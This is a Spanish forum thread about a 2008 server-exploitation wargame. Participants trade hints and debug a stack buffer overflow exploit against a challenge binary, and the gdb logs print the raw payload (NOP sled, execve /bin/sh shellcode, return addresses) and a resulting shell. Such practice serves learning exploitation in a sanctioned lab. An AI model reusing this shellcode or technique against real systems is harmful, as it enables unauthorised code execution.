 Autor
|
Tema: Torneo de explotacion de servidores (Leído 30630 veces)
|
blackngel
 Desconectado
Mensajes: 19
|
Jejeje... AVERIGUADO! Creo que ha sido de las pruebas que más me ha reconfortado! Desde luego esta si que me encantaría documentarla, tiene mucha miga  Repito entonces: ¿Habrá puntos por documentar pruebas individuales? Bueno, a ver que toca ahora xD ¿Format String? Un abrazo! |
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
Que bien que la aigas pasado  veo que estoy cumpliendo mi objetivo!! Repito entonces: ¿Habrá puntos por documentar pruebas
individuales?
Se lo comenta ayer a sdc, pero en realidad me fui a dormir por que tenia mucho sueño  , me imagino que si va a ver meritos, puntos no se, y menos lo de la cuenta @elhacker.net pero pues ya estas por buen camino  en un rato mas y pasa el reto completo. Bueno, a ver que toca ahora xD ¿Format String?
No exactamente un FS, pero el titulo dice dejavu creo que me recuerda a la pelicula de the matrix: http://www.youtube.com/watch?v=z_KmNZNT5xw
|
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Bien Veremos que se puede hacer, aunque lo de acabarlo va estar difícil. Dos cuestiones: - ¿Diferencia entre méritos y puntos? - Comentar que es una pena no disponer de herramientas como "strace" y/o "ltrace". ¿Es una decisón deliberada? Saludos! |
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
Hola que tal !!  %man truss Wikipedia http://es.wikipedia.org/wiki/Stracestrace es una utilidad de comprobación de errores en el sistema operativo GNU/Linux que sirve para monitorizar las llamadas al sistema usadas por un determinado programa y todas las señales que éste recibe, es similar a la aplicación truss disponible en otros sistemas Unix. Esto es posible por una característica del núcleo linux llamada ptrace. |
|
|
|
« Última modificación: 12 Diciembre 2008, 21:18 por Anon »
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Ok ok...
Cuanto se aprende... :p
Pero ahora ser buenos. Alguna pista para la 3ª prueba?
Me ocurren cosas muy raras que no habia visto nunca!
Bye!
|
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
Hola que tal nuevamente veo que estas entretenido  Me ocurren cosas muy raras que no habia visto nunca!
Lo mismo me dije hace unos meses pues la pista es que es un dejavu!! No es broma Saludos. |
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Te pido un favor: He creado un exploit ex1.c en mi directorio, y consigo una shell "sh" si lo ejecuto desde "gdb" con "run 1029 5". Salen 2 mensajes de SIGTRAP y debes escribir "c" 2 veces. Luego tienes la shell pero no tengo permisos para hacer nada mas. Desde fuera y con los mismos parametros ($./ex1 1029 5) solo consigo un "bus error". No entiendo que demonios pasa, cuando vi la SHELL ya estaba saltando de alegria y ahora nada! Puedes echarle un vistazo y probarlo tu? Muchas gracias! Un abrazo! |
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
Bueno lo he probado y pues: %gdb ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfec58 Offset: 0x5 Return: 0xbfbfec53
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:
1ÀPh//shh/binãPTSP°;Íì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿Sì¿¿
Program received signal SIGBUS, Bus error.
0xbfbfec54 in ?? ()
(gdb) c
Continuing.
Program terminated with signal SIGBUS, Bus error.
No dudo que te haya funcionado, sin embargo este dejavu es un dejavu  ... pero la matrix cambio algo  Saludos. |
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
C:/Users/NikiSanders/Desktop>gdb ./ex1
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging symbols found)...
(gdb) run 1029 5
Starting program: /usr/home/NikiSanders/ex1 1029 5
(no debugging symbols found)...(no debugging symbols found)...Usage: /usr/home/NikiSanders/ex1<buff_size> <offset> <esp: 0xfff...>
ESP:0xbfbfebf8 Offset: 0x5 Return: 0xbfbfebf3
Program received signal SIGTRAP, Trace/breakpoint trap.
0x0884a3e0 in ?? () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
Dejavu?
Usted paso como parametro lo siguiente:
����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��PTSP�;̀뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿�뿿
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
It might be running in another process.
Further execution is probably impossible.
0x088643e0 in _rtld_thread_init () from /libexec/ld-elf.so.1
(gdb) c
Continuing.
$ id
uid=7027(NikiSanders) gid=6001(warusers) groups=6001(warusers),5000(warzone),5001(warzone1),5002(warzone2)
$ exit
Program exited normally.
(gdb)
|
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
A ya me acorde por que suele suceder eso, bueno resulta que el valor del get_esp cambia dependiendo de la cantidad de procesos que exista en memoria, tal vez por eso no me salio.
Muchas veces por ejemplo hago cosas asi con modo grafico y pues el offset del exploit es uno, y despues lo hago en modo terminal y pues otro tanto.
Voy a ver lo del exploit y te veo que pasa.
Saludos.
|
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Ok, veo que lo de dormir tampoco es lo tuyo Esperaré ansioso tus observaciones! Me hace gracia, porque yo consigo una shell xD, lo cual quiere decir que en definitiva la ejecuta el propopio "dejavu", lo que ocurre que lo hace dentro de "ex1" y este dentro de "gdb". 1 ->Una llamada a execve sustituye un proceso por otro, y cambian los permisos entoces "ex1" hace bien su trabajo. 2 -> Gdb no es sustituido al ejecutar el proceso sino que lo mantiene en un entorno controlado (hasta donde yo entiendo) y debe ser por eso que no obtengo los permisos, quizas porque se mantienen los mismos con los que he ejecutado "gdb" En fin, no se... que penita! Un abrazo! |
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Jeje, prueba pasada! Tengo buen despertar Tenías razón, fui tan necio de no fijarme que el %esp cambiaba al ejecutar la aplicacion sola en gdb. Tenia la solución delante de mis narices xD Muchas gracias por todo y a seguir! |
|
|
|
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
Nada.. no hay manera en la 4ª He visto lo de "broken pipe" pero no tengo ni idea de si ese error se puede aprovechar para algo! Alguien va a terminar el torneo? xDDD |
|
|
|
|
En línea
|
|
|
|
Anon
Estudiante y
Colaborador
Desconectado
Mensajes: 1.895
Anonymous & Paranoid
|
mmm , Antes Program terminated with signal 11, Segmentation fault.
#0 0x20202020 in ?? ()
A ver si ahora si!!, a peticion de algunos por privado he cambiado el orden de una variable, tal vez no esta muy obvio pero en fin, he quitado la trampa , Ahora esta mas facil Despues Program terminated with signal 11, Segmentation fault.
#0 0x20202020 in ?? ()
Saludos. |
|
|
|
« Última modificación: 13 Diciembre 2008, 15:10 por Anon »
|
En línea
|
|
|
|
blackngel
Desconectado
Mensajes: 19
|
... ni pajolera... Ahora ya no consigo ni el "broken pipe" menos todavía un "segmentation fault". No se por donde van los tiros. A ver si resulta que se me va a dar mejor la documentación que la explotacion |
|
|
|
|
En línea
|
|
|
|
|
 |
